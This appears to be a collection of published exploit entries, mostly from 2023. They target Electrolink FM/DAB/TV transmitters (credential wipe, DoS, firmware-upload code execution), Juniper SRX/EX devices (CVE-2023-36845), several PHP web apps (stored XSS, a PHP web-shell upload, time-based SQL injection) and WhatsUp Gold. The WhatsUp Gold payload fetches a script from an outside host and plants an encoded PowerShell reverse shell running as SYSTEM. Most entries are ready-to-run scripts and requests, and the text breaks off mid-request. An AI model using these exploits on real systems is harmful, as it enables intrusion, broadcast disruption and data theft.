#!/usr/bin/env python # # # Electrolink FM/DAB/TV Transmitter Remote Authentication Removal # # # Vendor: Electrolink s.r.l. # Product web page: https://www.electrolink.com # Affected version: 10W, 100W, 250W, Compact DAB Transmitter # 500W, 1kW, 2kW Medium DAB Transmitter # 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter # 100W, 500W, 1kW, 2kW Compact FM Transmitter # 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter # 15W - 40kW Digital FM Transmitter # BI, BIII VHF TV Transmitter # 10W - 5kW UHF TV Transmitter # Web version: 01.09, 01.08, 01.07 # Display version: 1.4, 1.2 # Control unit version: 01.06, 01.04, 01.03 # Firmware version: 2.1 # # Summary: Since 1990 Electrolink has been dealing with design and # manufacturing of advanced technologies for radio and television # broadcasting. The most comprehensive products range includes: FM # Transmitters, DAB Transmitters, TV Transmitters for analogue and # digital multistandard operation, Bandpass Filters (FM, DAB, ATV, # DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial # switches, Manual patch panels, RF power meters, Rigid line and # accessories. A professional solution that meets broadcasters needs # from small community television or radio to big government networks. # # Compact DAB Transmitters 10W, 100W and 250W models with 3.5" # touch-screen display and in-built state of the art DAB modulator, # EDI input and GPS receiver. All transmitters are equipped with a # state-of-the art DAB modulator with excellent performances, # self-protected and self-controlled amplifiers ensure trouble-free # non-stop operation. # # 100W, 500W, 1kW and 2kW power range available on compact 2U and # 3U 19" frame. Built-in stereo coder, touch screen display and # efficient low noise air cooling system. Available models: 3kW, # 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters # with fully broadband solid state amplifiers and an efficient # low-noise air cooling system. 
# # FM digital modulator with excellent specifications, built-in # stereo and RDS coder. Digital deviation limiter together with # ASI and SDI inputs are available. These transmitters are ready # for ISOFREQUENCY networks. # # Available for VHF BI and VHF BIII operation with robust desing # and user-friendly local and remote control. Multi-standard UHF # TV transmitters from 10W up to 5kW with efficient low noise air # cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC # and ISDB-Tb available. # # Desc: The application is vulnerable to an unauthenticated # parameter manipulation that allows an attacker to set the # credentials to blank giving her access to the admin panel. # Also vulnerable to account takeover and arbitrary password # change. # # Tested on: Mbedthis-Appweb/12.5.0 # Mbedthis-Appweb/12.0.0 # # # Vulnerability discovered by Neurogenesia # Macedonian Information Security Research & Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2023-5792 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php # # # 30.06.2023 # # import datetime import requests dt = datetime.datetime.now() dt = dt.strftime('%d.%m.%Y %H:%M:%S') nul = '' print('Starting transmitter exploit at', dt) ip = input('Enter transmitter ip: ') if 'http' not in ip: ip = 'http://' + ip ep = '/login.htm' url = ip + ep signature = {'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'ku-MK,en;q=0.1806', 'User-Agent' : 'Broadcastso/B.B', 'Connection' : 'keep-alive' } # ----------------- Line breaker v0.17 ----------------- postd = { 'adminuser' : nul, 'guestuser' : nul, 'adminpassword' : nul, 'guestpassword' : nul } print('Removing security control...') r = requests.post(url, data = postd, headers = signature) if r.status_code == 200: print('Done. Go and "Login".') else: print('Error') exit(-4)
-
Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS
Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. 
A digital deviation limiter together with ASI and SDI inputs is available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust design and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The transmitter is vulnerable to a Denial of Service (DoS): an unauthenticated attacker can reset the board or stop transmitter operation by sending a single GET request to the command.cgi gateway (web=r resets the board, web=K stops the transmitter, web=J starts it), as shown below. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5795 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php 30.06.2023 -- C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board) Success! OK C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop) Success! OK C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start) Success! OK
-
Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution
Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. 
A digital deviation limiter together with ASI and SDI inputs is available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust design and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device exposes an unprotected /upload endpoint that accepts an MPFS file-system binary image without any authentication. The MPFS2 file system module provides a light-weight read-only file system that can be stored in external EEPROM, external serial Flash, or internal Flash program memory. This file system serves as the basis for the HTTP2 web server module, but is also used by the SNMP module and is available to other applications that require basic read-only storage capabilities. Because the upload replaces that image, an attacker can overwrite the flash program memory that holds the web server's main interfaces and execute arbitrary code. 
Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5796 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html 30.06.2023 -- POST /upload HTTP/1.1 Host: 192.168.150.77:8888 Content-Length: 251 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----joxypoxy User-Agent: MPFS2_PoC/1.0c Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Login=IgnoreMePlsKtnx Connection: close ------joxypoxy Content-Disposition: form-data; name="i"; filename="MPFSimg.bin" Content-Type: application/octet-stream MPFS...<CGI BINARY PHONE HOME> -----joxypoxy-- HTTP/1.1 200 OK Connection: close Content-Type: text/html <html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html> --- hd htm: 0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C.... 2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d.... 00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm.<ht 6d 6c 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 53 4c 3c ml>..<title>ZSL< ... ... 
64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..- --- MPFS Structure: [M][P][F][S] [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files] [Name Hash 0][Name Hash 1]...[Name Hash N] [File Record 0][File Record 1]...[File Record N] [String 0][String 1]...[String N] [File Data 0][File Data 1]...[File Data N] --- C:\>javaw -jar MPFS2.jar C:\>mpfs2 -v -l MPFSimg.bin Version: 2.1 Number of files: 1 (1 regular, 0 index) Number of dynamic variables: 0 FileRecord 0: .StringPtr = 32 index0.htm .DataPtr = 43 .Len = 48 .Timestamp = 2023-08-27T14:39:30Z .Flags = 0
-
Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)
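# ***************************************************************************************************
# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)
# Description:
#
# This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.
# It executes the phpinfo() function on the login page of the target device,
# allowing inspection of the PHP configuration. The script can also save the phpinfo()
# output to a file for further analysis.
#
# Detection note: a bare HTTP 200 is NOT evidence of vulnerability - the J-Web login
# page answers 200 on patched devices too. The device is only reported as vulnerable
# when the response body contains the phpinfo() output the payload injects.
#
# Shodan Dork: http.favicon.hash:2141724739
# Date: 2023/10/01
# Exploit Author: whiteOwl ([email protected])
# Vendor Homepage: https://whiteowl-pub.github.io
# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5,
#          21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22.
#          4R2-S1/R3,23.2R1-S1/R2
# Tested on: JUNOS SM804122pri 15.1X49-D170.4
# CVE : cve-2023-36845
# ***************************************************************************************************
import argparse

import requests

banner = """
*************************************************************
* CVE-2023-36845 Vulnerability Detector & Proof of concept  *
*                                                           *
* This script checks for the CVE-2023-36845 vulnerability   *
* and runs phpinfo() on vulnerable devices.                 *
* If you suspect a vulnerable system, please take action    *
* immediately to secure it.                                 *
*                                                           *
* Author: whiteowl                                          *
*************************************************************
"""

# Default connect/read timeout in seconds; without one a hung device blocks forever.
DEFAULT_TIMEOUT = 15


def _looks_like_phpinfo(body):
    """Return True when *body* contains the markers that phpinfo() output carries.

    The injected auto_prepend_file runs ``phpinfo()`` (see the base64 blob in
    ``send_request``), so a successful exploit answers with the phpinfo() HTML
    page instead of the normal login page.

    Args:
        body: Decoded HTTP response body.
    """
    return "phpinfo()" in body or "PHP Version" in body


def send_request(url, output_file=None, verbose=False, insecure=False, timeout=DEFAULT_TIMEOUT):
    """Send the CVE-2023-36845 PHPRC=/dev/fd/0 probe to *url* and report the result.

    Args:
        url: Base URL of the J-Web interface, e.g. ``https://10.0.0.1``.
        output_file: Optional path; the raw response body is written there.
        verbose: Print status code, headers and body to stdout.
        insecure: Skip TLS certificate verification (J-Web typically ships a
            self-signed certificate).
        timeout: Seconds to wait for connect/read before giving up.

    Returns:
        None. Results are printed; network errors are reported, not raised.
    """
    # PHPRC points PHP at fd 0 (the request body) as its php.ini, which is what
    # lets an unauthenticated client inject configuration directives.
    target_url = f"{url.rstrip('/')}/?PHPRC=/dev/fd/0"
    # php.ini content: allow data:// includes and prepend a file that runs phpinfo().
    # The base64 decodes to:  <?\n   phpinfo();\n?>
    data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
    headers = {
        'User-Agent': 'Mozilla/5.0',
    }

    try:
        response = requests.post(
            target_url,
            headers=headers,
            data=data,
            timeout=timeout,
            verify=not insecure,
        )
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")
        return

    body = response.text
    if response.status_code == 200 and _looks_like_phpinfo(body):
        print("The Target Device is Vulnerable to: CVE-2023-36845")
    elif response.status_code == 200:
        # Reachable login page, but our payload did not execute.
        print("Not Vulnerable: HTTP 200 but no phpinfo() output in the response")
    else:
        print("Not Vulnerable: Status Code", response.status_code)

    if output_file:
        with open(output_file, 'w', encoding='utf-8') as file:
            file.write(body)

    if verbose:
        print(f"HTTP Status Code: {response.status_code}")
        print("Response Headers:")
        for header, value in response.headers.items():
            print(f"{header}: {value}")
        print("Response Content:")
        print(body)


def main():
    """Parse the command line and run a single probe."""
    print(banner)
    parser = argparse.ArgumentParser(description="CVE-2023-36845 detector / phpinfo() proof of concept")
    parser.add_argument("-u", "--url", required=True, help="Base URL of the target J-Web interface")
    parser.add_argument("-o", "--output", help="Output file to save the HTML content")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")
    parser.add_argument("-k", "--insecure", action="store_true",
                        help="Do not verify the TLS certificate (self-signed J-Web certs)")
    parser.add_argument("-t", "--timeout", type=float, default=DEFAULT_TIMEOUT,
                        help=f"Request timeout in seconds (default: {DEFAULT_TIMEOUT})")
    args = parser.parse_args()
    send_request(args.url, args.output, args.verbose, insecure=args.insecure, timeout=args.timeout)


if __name__ == "__main__":
    main()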
-
GYM MS - GYM Management System - Cross Site Scripting (Stored)
# Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored) # Date: 29/09/2023 # Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip # Version: 1.0 # Last Update: 31 August 2022 # Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30 # 1: Create a user, log in and go to profile.php # 2: Submit the payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in the lname field. # 3: The stored payload is rendered on every load of profile.php: the lname value is echoed into a quoted attribute without encoding, so the payload closes the attribute and injects an onmouseover handler that fires alert(document.cookie) when the element is hovered. # Author This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner. # About Rapplex Rapplex is a web application security scanner that scans and reports vulnerabilities in websites. Pentesters can use it as an automation tool for daily tasks, and "Pentester Studio" is a useful addition in manual assessments as well, so no separate development tools are needed to discover different types of vulnerabilities or to extend existing engines. "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection and File Inclusion. # HTTP Request POST /gym/profile.php HTTP/1.1 Host: localhost Content-Length: 129 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE Connection: close fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update
-
Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE # Date: 07.10.2023 # Exploit Author: Oğulcan Hami Gül # Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code # Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code # Version: 1.0 # Tested on: Windows 10 ## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication. POST /pms/users.php HTTP/1.1 Host: 192.168.1.36 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367 Content-Length: 1054 Origin: http://192.168.1.36 Connection: close Referer: http://192.168.1.36/pms/users.php Upgrade-Insecure-Requests: 1 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="display_name" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="user_name" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="password" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php" Content-Type: application/x-php <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd <!-- http://michaeldaw.org 2006 --> -----------------------------421755697017784551042596452367 Content-Disposition: 
form-data; name="save_user" -----------------------------421755697017784551042596452367-- ## After the attacker sends the upload request, the application stores the file under /pms/user_images/ with a numeric prefix (a Unix timestamp in the example below) prepended to the original filename; the .php extension is preserved, so the web server executes it. The uploaded file can then be requested from /pms/user_images/ without any authentication. ## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary commands on the application server.
-
Curfew e-Pass Management System 1.0 - FromDate SQL Injection
# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL Injection # Date: 28/9/2023 # Exploit Author: Puja Dey # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Wamp 1) Log in to the application (the vulnerable page requires an authenticated session) 2) Click "Report on pass" and capture the request in Burp Suite 3) The "fromdate" POST parameter is vulnerable to time-based blind SQL injection Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND 'SOzQ'='SOzQ&todate=&submit= 4) Put '*' in the value of the fromdate parameter and save the request as cpme 5) Run sqlmap -r cpme --batch --dbs --random-agent
-
MISP 2.4.171 - Stored XSS
# Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated) # Date: 8th October 2023 # Exploit Author: Mücahit Çeri # Vendor Homepage: https://www.circl.lu/ # Software Link: https://github.com/MISP/MISP # Version: 2.4.171 # Tested on: Ubuntu 20.04 # CVE : CVE-2023-37307 # Exploit: Logged in as a low-privileged account 1) Click the "Galaxies" button in the top menu 2) Click "Add Cluster" in the left menu 3) Enter the payload "</title><script>alert(1)</script>" in the Name parameter 4) Fill the other fields with arbitrary values and click Submit 5) When the cluster is displayed, alert(1) fires: the Name value is inserted into the page <title> without escaping, so the closing </title> tag lets the script run
-
WhatsUp Gold 2022 (22.1.0 Build 39) - XSS
# Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS) # Date: April 18, 2023 # Exploit Author: Andreas Finstad (4ndr34z) # Vendor Homepage: https://www.whatsupgold.com # Version: v.22.1.0 Build 39 # Tested on: Windows 2022 Server # CVE : CVE-2023-35759 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759 WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter. Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39) Product Name: WhatsUp Gold 2022 Version: 22.1.0 Build 39 Vulnerability Type: Stored Cross-Site Scripting (XSS) Description: WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field of a monitored device: after discovery, the value returned by the SNMP device is rendered in the admin console without sanitisation. An attacker who controls (or spoofs) an SNMP-reachable device can set a crafted sysName containing malicious code. Once the device name is saved and rendered in the admin console, the injected code executes in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions. As there are no CSRF tokens and no Content Security Policy (CSP) on the console, it is trivial to craft a JavaScript payload that adds a scheduled action on the server which executes code as "NT System" (NT AUTHORITY\SYSTEM). In my POC code, I add a PowerShell reverse shell that connects out to the attacker every 5 minutes. 
(screenshot3) The XSS trigger when clicking the "All names and addresses" Stage: Base64 encoded id property: var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a); Staged payload placed in the SNMP sysName Field on a device: <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))> payload: var vhost = window.location.protocol+'\/\/'+window.location.host addaction(); async function addaction() { var arguments = '' let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{ method: 'POST', headers: { 'Connection': 'close', 'Content-Length': '1902', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'sec-ch-ua-platform': '"macOS"', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include', body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e 
JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}' }); setTimeout(() => { getactions(); }, 1000); }; async function getactions() { const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{ method: 'GET', headers: { 
'Connection': 'close', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'sec-ch-ua-platform': '"macOS"', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include' }); const actions = await response.json(); var results = []; var searchField = "Name"; var searchVal = "Systemtask"; for (var i=0 ; i < actions.length ; i++) { if (actions[i][searchField] == searchVal) { results.push(actions[i].Id); revshell(results[0]) } } //console.log(actions); }; async function revshell(ID) { fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{ method: 'POST', headers: { 'Connection': 'close', 'Content-Length': '2442', 'Cache-Control': 'max-age=0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"macOS"', 'Upgrade-Insecure-Requests': '1', 'Origin': 'https://192.168.16.100', 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'iframe', 'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp', 'Accept-Encoding': 'gzip, 
